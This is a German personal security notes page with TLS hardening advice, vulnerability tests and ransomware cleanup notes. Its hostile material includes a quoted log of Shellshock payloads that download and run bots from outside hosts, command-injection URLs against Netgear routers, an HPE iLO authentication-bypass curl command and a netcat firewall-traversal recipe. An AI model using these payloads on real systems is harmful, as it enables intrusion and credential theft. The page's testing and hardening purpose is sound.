Deine IP-Adresse ist die 34.204.176.71
Dein Browser: CCBot/2.0 (https://commoncrawl.org/faq/)
Links:
Metasploit Project
Goolag
NTPD
Maltego Systemanalyse, Netzwerkanalyse wird Grafisch dargestellt.
Ukash/Paysafe-Trojaner
Google Safebrowsing (www.google.de durch die zu abfragende Domain ersetzen)
Google Security Research
SSL sicher konfigurieren (bettercrypto.org)
SSL Server Sicherheit testen (www.ssllabs.com)
Observatory by Mozilla
Hacking the Western Digital MyCloud NAS
WDMyCloud Multiple Vulnerabilities
EICAR Antivirus Test String
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Der String kann in einer .com Datei gespeichert werden.
!!! Die Aufzählung erhebt kein Anspruch auf Vollständigkeit !!!
aktuelle Standards | unsichere Standards |
---|---|
Verschlüsselung | |
AES-GCM, CHA-CHA20/Poly1305, Camellia | RC4, 3DES-CBC, AES-CBC |
Krypo Hash | |
SHA2, SHA-256, SHA-512/256, SHA-384 ,SHA-512, SHA3-256, SHA3-384, SHA3-512 | MD5, SHA1 |
Protokolle | |
TLS1.2 mit PFS, TLS1.3 | SSLv2, SSLv3, TLS1.0, TLS1.1 |
Zertifikate | |
Zertifikate >= 2048Bit RSA, Elliptische Kurve | Zertifikate < 2048Bit RSA |
BSI Unsichere kryptographische Algorithmen
Kryptographie in der IT - Empfehlungen zu Verschlüsselung und Verfahren
Cipher Block Chaining (CBC)
Galois/Counter Mode (GCM)
Transport Layer Security (TLS)
- IMAP Server SSL Test
openssl s_client -connect imap.domain.tld:993 ... Cipher : ECDHE-RSA-AES256-SHA ...
DH oder ECDHE zeigt an, Forward Secrecy ist zwischen den Kommunikationspartnern aktiv
- Test ob der Server Forward Secrecy beherrscht
openssl s_client -cipher 'ECDH:DH' -connect www.domain.tld:443
- Forward Secrecy Test, Verschlüsselung über STARTTLS
openssl s_client -starttls smtp -connect smtp.domain.tld:587
SMTP, POP3, IMAP und FTP werden als Protokoll auch noch unterstützt.
Microsoft SQL Server Desktop Engine legt ein Benutzerkonto "sa" auf dem Rechner an, das Kennwort ist leer. Der Datenbankserver nimmt Anfragen über das Netzwerk auf TCP/IP Port 1433 an. Den laufenden MSDE erkennt man am Symbol in der Taskleiste, oder mit "NETSTAT -A". Das Passwort läst sich ändern mit dem Tool \BINN\OSQL -U sa -Q "sp_password NULL, 'geheim'" man wird zunächst nach dem Alten Password für den Benutzer "sa" gefragt, dann wird das Kennwort in "geheim" geändert in der Datenbank.
Bis zur Version 2.0.40 hat der Apache Webserver ein Fehler, der tritt nur in den nicht Unix Versionen auf. Der Fehler kann beseitigen werden, indem man in der Datei httpd.conf die Anweisung RedirectMatch 400 "\\\.\." einzufügen, und zwar vor dem ersten Auftreten eines Alias- oder Redirect-Befehls.
eine Sicherheitslücke in Windows, kann ausgenutzt werden um Befehle auszuführen.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Windows]
"NoInteractiveServices"=dword:00000001
der Patch MS02-045 oder Q326830 beseitigen einen Fehler im SMB-Protokoll von Microsoft, der Fehler macht ein Denial of Service Angriff möglich
Um zu verhindern, das Verbindungen ohne aktiver Firewall ins Internet gehen,
muss dieser Eintrag in der Registry erstellt werden.
Für W2k und WXP
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\fwdrv]
"AlwaysSecure"=dword:00000001
Für W9x
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\VXD\fwdrv]
"AlwaysSecure"=dword:00000001
Bei dem Befall mit CWS verliert der Nutzer die Kontrolle über den Browser, es werden unerwünscht Internetseiten aufgerufen, beim besuch von Google werden Popups eingeblendet oder die Suche auf eine andere Seite umgeleitet, die Startseite des Browsers wird geändert usw., kurz gesagt der Browser ist Entführt (Hijacking).
Tools zur Entfernung:
CWShredder & HijackThis
Webscarab ist ein Java Proxy auf Port 8008 der die Pakete zwischen Browser und Server mitschneidet. Man kann mit ihm HTTP als auch HTTPS Pakete protokollieren.
Webscarab kann man über eine Batch starten, voraussetzung JAVA ist installiert.
java -jar webscarab-selfcontained-20060718-1904.jar
mit Netcat und HPing2
Scenario ein Rechner LOCAL hinter einer Stateful Firewall die UDP Verbindungen ins INet zulässt.
mit Netcat einen UDP-Listener auf Port 14000 starten
local/1# nc -u -l -p 14000
mit einer zweiten Rechner (REMOTE) im INet versuchen eine Nachricht zu schicken
remote# echo "hello" | nc -p 53 -u local-fw 14000
der erste Versuch mit LOCAL Kontakt aufzunehmen schlägt fehl, da die Firewall keine Verbindungsversuche von ausserhalb annimmt.
auf einer zweiten Console von LOCAL mit HPing2 eine Verbindung initialisieren
local/2# hping2 -c 1 -2 -s 14000 -p 53 remote
REMOTE meldet daraufhin via ICMP "Port Unreachable" zurück, aber die Firewall hat für LOCAL einen Port geöffnet mit dem REMOTE den LOCAL erreichen kann
remote# echo "hello" | nc -p 53 -u local-fw 14000
der Listener von Netcat auf LOCAL meldet daraufhin ein "HELLO", das Paket hat die Firewall passiert und ist zum Rechner dahinter gelangt.
DNS Cache Poisoning
DDoS-Attacke durch recursive DNS-Queries
im Beispiel den ns1.example.com
durch den DNS Server ersetzen der getestet werden soll.
dig +short @ns1.example.com porttest.dns-oarc.net TXT
Weiterleitung testen.
host google.com ns1.example.com
Weiterleitung von Anfragen nach Domains, für die der Server nicht verantwortlich ist deaktivieren.
# /etc/bind/named.conf.options options { ... allow-recursion { none; }; ... };
oder auf das eigene Intranet Netzwerk beschränken.
# /etc/bind/named.conf.options options { ... allow-recursion { 10.0.0.0/8; 192.168.0.0/24; 127.0.0.0/8; ::1; }; ... };
SSL Bug check Datei hb-test.py
OpenMAGIC
Auszug aus dem Apache LOG File
() { :;}; /bin/bash -c \"cd /var/tmp ; rm -rf j* ; wget http://89.33.193.10/ji ; lwp-download \ http://89.33.193.10/ji;curl -O /var/tmp/ji http://89.33.193.10/ji ; perl /var/tmp/ji ; rm -rf *ji;rm -rf jur\" "GET /cgi-bin/test-cgi HTTP/1.0" 404 496 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\"" "GET /cgi-bin/helpme HTTP/1.0" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\"" "GET /cgi-bin/test-cgi HTTP/1.0" 404 496 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\"" "GET /cgi-bin/bash HTTP/1.0" 404 492 "-" "() { :;}; /bin/bash -c \"wget http://ellrich.com/legend.txt -O /tmp/.bash;killall -9 perl;perl /tmp/.bash\"" "GET / HTTP/1.0" 200 628 "-" "() { :;}; /bin/bash -c \"wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\"" "GET /cgi-bin/helpme HTTP/1.0" 404 461 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/jurat;curl -O /tmp/jurat http://213.5.67.223/jurat ; perl /tmp/jurat*;rm -rf /tmp/jurat\""
- Shellschock Test auf der Konsole
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
wenn die Ausgabe wie folgt, ist alles gepatcht.
this is a test
bei der Ausgabe, ist der Patch nicht eingepielt.
vulnerable this is a test
- Apache Webserver
# /etc/apache2/mods-enabled/ssl.conf ... SSLProtocol All -SSLv2 -SSLv3 ...
service apache2 restart
- Postfix SMTP Server
# /etc/postfix/main.cf ... smtpd_tls_mandatory_protocols = !SSLv2 !SSLv3 smtp_tls_mandatory_protocols = !SSLv2 !SSLv3 smtp_tls_protocols = !SSLv2, !SSLv3 smtpd_tls_protocols = !SSLv2 !SSLv3 ...
- Dovecot
# /etc/dovecot/conf.d/10-ssl.conf ... ssl_protocols = !SSLv2 !SSLv3 ...
openssl s_client -ssl3 -connect <server>:25 -starttls smtp openssl s_client -ssl3 -connect <server>:110 -starttls pop3 openssl s_client -ssl3 -connect <server>:143 -starttls imap openssl s_client -ssl3 -connect <server>:237 openssl s_client -ssl3 -connect <server>:443 openssl s_client -ssl3 -connect <server>:465 openssl s_client -ssl3 -connect <server>:587 -starttls smtp openssl s_client -ssl3 -connect <server>:993 openssl s_client -ssl3 -connect <server>:995 openssl s_client -ssl3 -connect <server>:8443
wenn der Handshake fehlschlägt, ist SSLv3 deaktiviert sslv3 alert handshake failure
# openssl s_client -ssl3 -connect <server>:587 -starttls smtp CONNECTED(00000003) 139935036806848:error:14094410:SSL routines:SSL3_READ_BYTES:sslv3 alert handshake failure:s3_pkt.c:1260:SSL alert number 40 139935036806848:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt.c:596:
Version der Glibc anzeigen und abhängige Programme auflisten.
ldd --version lsof | grep libc | awk '{print $1}' | sort | uniq
Der SSL gesicherte Server fällt auf einen unsicheren 512-Bit-Schlüssel zurück.
-
openssl s_client -connect www.domain.tld:443 -cipher EXPORT
wenn die Ausgabe handshake failure erscheint, ist der Server sicher.
- Laden der Scripte
cd ~ mkdir drown cd drown git clone https://github.com/tomato42/tlsfuzzer cd tlsfuzzer git checkout ssl2 git clone https://github.com/tomato42/tlslite-ng .tlslite-ng ln -s .tlslite-ng/tlslite tlslite cd .tlslite-ng/ git checkout sslv2 cd ~/drown/tlsfuzzer git clone https://github.com/warner/python-ecdsa .python-ecdsa ln -s .python-ecdsa/ecdsa ecdsa
- Check durchführen, wenn alles OK ist, sieht es wie folgt aus.
cd ~/drown/tlsfuzzer PYTHONPATH=. python scripts/test-sslv2-force-export-cipher.py -h 192.168.101.2 -p 443 Connect with TLSv1.0 EXP-RC4-MD5 ... OK Connect with SSLv2 EXP-RC4-MD5 ... OK Connect with SSLv3 EXP-RC4-MD5 ... OK Connect with TLSv1.0 EXP-RC2-CBC-MD5 ... OK Connect with SSLv3 EXP-RC2-CBC-MD5 ... OK Connect with SSLv2 EXP-RC2-CBC-MD5 ... OK Note: SSLv2 was officially deprecated (MUST NOT use) in 2011, see RFC 6176. If one or more of the tests fails because of error in form of Unexpected message from peer: Handshake() With any number inside parethensis, and the server is configured to not support SSLv2, it means it most likely is vulnerable to CVE-2015-3197 and CVE-2016-0800. In case it's a RC4 or 3DES cipher, you may verify that it really supports it using: test-sslv2-connection.py Test end successful: 6 failed: 0
- Apache SSL Konfiguration anpassen
SSLProtocol All -SSLv2 -SSLv3
- Datei test.php auf dem WebServer erstellen, mit folgenden Inhalt
<?php var_dump($_SERVER['HTTP_PROXY']);
Proxy Test
curl -H "PROXY: http://example.invalid" http://example.org/test.php
vom Kernel 3.6 bis 4.7 ist es möglich HTTP Verbindungen zu kapern, das Linuxsystem hat ein Limit vom 100 ACK Paketen pro Sekunde voreingestellt. Wir der Rechner mit präparierten Paketen bombardieren, ist das Limit vom 100 ACK Paketen schnell erreicht und er verschickt keine ACK-Pakete mehr.
- Limit in der sysctl.conf erhöhen
# /etc/sysctl.conf net.ipv4.tcp_challenge_ack_limit = 999999999
- neue Einstellungen aktivieren
sysctl -p
Ist die WPAD Konfiguration nicht unter der URL http://wpad.example.com/wpad.dat
verfügbar, kann es vorkommen das der Browser die Datei unter http://wpad.com/wpad.dat
oder http://wpad.de/wpad.dat
sucht.
Wenn dann unter der externen Domain die Datei gefunden wird, kann ein Angreifer ein Proxy für Man-in-the-Middle Angriffe platzieren.
KRACK - so funktioniert der Angriff auf WPA2
Leitfaden für IT-Experten zum Schutz vor spekulativen ausführungsseitigen Channelsicherheitsanfälligkeiten bei Windows-Clients
Leitfaden zum Schutz vor spekulativen ausführungsseitigen Channelsicherheitsanfälligkeiten bei Windows-Servern
Install-Module SpeculationControl # Save the current execution policy so it can be reset $SaveExecutionPolicy = Get-ExecutionPolicy Get-SpeculationControlSettings # Reset the execution policy to the original state Set-ExecutionPolicy $SaveExecutionPolicy -Scope Currentuser
Speculation control settings for CVE-2017-5715 [branch target injection] For more information about the output below, please refer to https://support.microsoft.com/en-in/help/4074629 Hardware support for branch target injection mitigation is present: False Windows OS support for branch target injection mitigation is present: True Windows OS support for branch target injection mitigation is enabled: False Windows OS support for branch target injection mitigation is disabled by system policy: False Windows OS support for branch target injection mitigation is disabled by absence of hardware support: True Speculation control settings for CVE-2017-5754 [rogue data cache load] Hardware requires kernel VA shadowing: True Windows OS support for kernel VA shadow is present: True Windows OS support for kernel VA shadow is enabled: True Windows OS support for PCID performance optimization is enabled: True [not required for security] Suggested actions * Install BIOS/firmware update provided by your device OEM that enables hardware support for the branch target injection mitigation BTIHardwarePresent : False BTIWindowsSupportPresent : True BTIWindowsSupportEnabled : False BTIDisabledBySystemPolicy : False BTIDisabledByNoHardwareSupport : True KVAShadowRequired : True KVAShadowWindowsSupportPresent : True KVAShadowWindowsSupportEnabled : True KVAShadowPcidEnabled : True
ohne Microcode Update (BIOS Update) funktionieren die Patches nicht.
Speculation control settings for CVE-2017-5715 [branch target injection] For more information about the output below, please refer to https://support.microsoft.com/en-in/help/4074629 Hardware support for branch target injection mitigation is present: True Windows OS support for branch target injection mitigation is present: True Windows OS support for branch target injection mitigation is enabled: True Speculation control settings for CVE-2017-5754 [rogue data cache load] Hardware requires kernel VA shadowing: True Windows OS support for kernel VA shadow is present: True Windows OS support for kernel VA shadow is enabled: True Windows OS support for PCID performance optimization is enabled: True [not required for security] BTIHardwarePresent : True BTIWindowsSupportPresent : True BTIWindowsSupportEnabled : True BTIDisabledBySystemPolicy : False BTIDisabledByNoHardwareSupport : False KVAShadowRequired : True KVAShadowWindowsSupportPresent : True KVAShadowWindowsSupportEnabled : True KVAShadowPcidEnabled : True
- Registry Schlüssel, falls dieser nicht von Antivirus Programm gesetzt wird.
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat" /v "cadca5fe-87d3-4b96-b7fb-a231484277cc" /t REG_DWORD /d 0 /f
- Der Key wird vom Windows Patch automatisch gesetzt.
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f
Windows Fix deaktivieren
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f
- testen ob ein System verwundbar ist, Debian ist in der Default Konfiguration nicht anfällig, Ubuntu ist anfällig.
sysctl -a | fgrep kernel.unprivileged_userns_clone # kein Problem kernel.unprivileged_userns_clone = 0 # bei der Ausgabe ist das System anfällig kernel.unprivileged_userns_clone = 1 sysctl: Schlüssel »net.ipv6.conf.all.stable_secret« wird gelesen sysctl: Schlüssel »net.ipv6.conf.default.stable_secret« wird gelesen sysctl: Schlüssel »net.ipv6.conf.eth0.stable_secret« wird gelesen sysctl: Schlüssel »net.ipv6.conf.lo.stable_secret« wird gelesen
Router finden, die von der Lücke betroffen sind.
PC mit dem Netzwerk des Netgear Routers verbinden und den Link aufrufen. http://www.routerlogin.net/cgi-bin/;echo$IFS'Verwundbar!'
Wenn die Meldung "Verwundbar!" ausgegeben wird, ist der Router betroffen. Abhilfe erreicht man durch einspielen eines Firmware Updates oder den Prozess des Webservers auf dem Router zu "Killen" http://www.routerlogin.net/cgi-bin/;killall$IFS'httpd'
Nach dem beenden des Webservers auf dem Router, kann dieser bis zum Neustart nicht mehr administriert werden.
- mit dem Befehl kann man die Authentifizierung am Server umgehen, danach können Passwörter im Klartext ausgelesen werden.
curl -i -k -H "Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA" https://<HPE-iLO-Adr>/rest/v1/AccountService/Accounts
- wenn die Ausgabe erscheint, ist der Fehler beseitigt.
HTTP/1.1 401 Unauthorized
Navigation:
hashcrack.blogspot.de
ixplizit
crackstation.net
md5this.com
Metasploit Project ist ein Schwachstellen-Test Framework.
Brutal Force Attacke
db_autopwn -t -p -e -s- b
Goolag
Google Hacking Database
mit Goolag läßt sich über Google eine Sicherheitsschwachstellensuche der Domain initialisieren.
# smb.conf [global] ... wide links = no ...
smbclient //localhost/ -U user%pass
ntpdc -n -c monlist <IP>
# /etc/ntp.conf disable monitor restrict default kod nomodify notrap nopeer noquery restrict -6 default kod nomodify notrap nopeer noquery
TeslaCrypt Decryption Tool
Eset TeslaCrypt-Decoder mit MasterKey
Kaspersky Virus-fighting utilities
MalWareRemovalGuides
Trend Micro Ransomware File Decryptor
Stampado Decrypter
ID-Ransomware - herrausfinden, welche Ransomware den Rechner verschlüsselt hat und ob es Decrypter gibt.
No more Ransom - Ransomware identifizieren durch Fileupload von verschlüsselten Dateien.
2016.04 - Trojan-Ransom.Win32.CryptXXX, erstellt <Orginal-Dateiname>.crypt
im Verzeichnis werden auch noch folgende Dateien angelegt
de_crypt_readme.bmp
de_crypt_readme.html
de_crypt_readme.txt
folgende Verzeichnisse sind zu bereinigen
C:\Users\<UserName>\AppData\Local\Temp\
C:\Users\<UserName>\AppData\LocalLow\
C:\ProgramData\{xxx-xxx-xxx}
2016.05 - Alpha Ransomware, erstellt <Orginal-Dateiname>.encrypt Dateien.
Alpha Ransomware Encryption Process wird über die Datei gestartet.
%APPDATA%\Windows\svchost.exe
im Verzeichnis werden folgende Dateien angelegt.
Read Me (How Decrypt) !!!!.txt
in der Registry wird noch der Taskmanager des Benutzers mit folgenden Eintrag blockiert.
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System] "DisableTaskMgr" = dword: 00000001
INTEL-SA-00075 Detection Guide
Intel® SCS – System Discovery Utility
- Netzwerk scannen
nmap -p16992-16995 192.168.2.0/24 | grep "16992/tcp open" -A4 -B3
- unter Windows Lokal prüfen
netstat -ano | findstr "\<16993\> \<16992\> \<16994\> \<16995\> \<623\> \<664\>"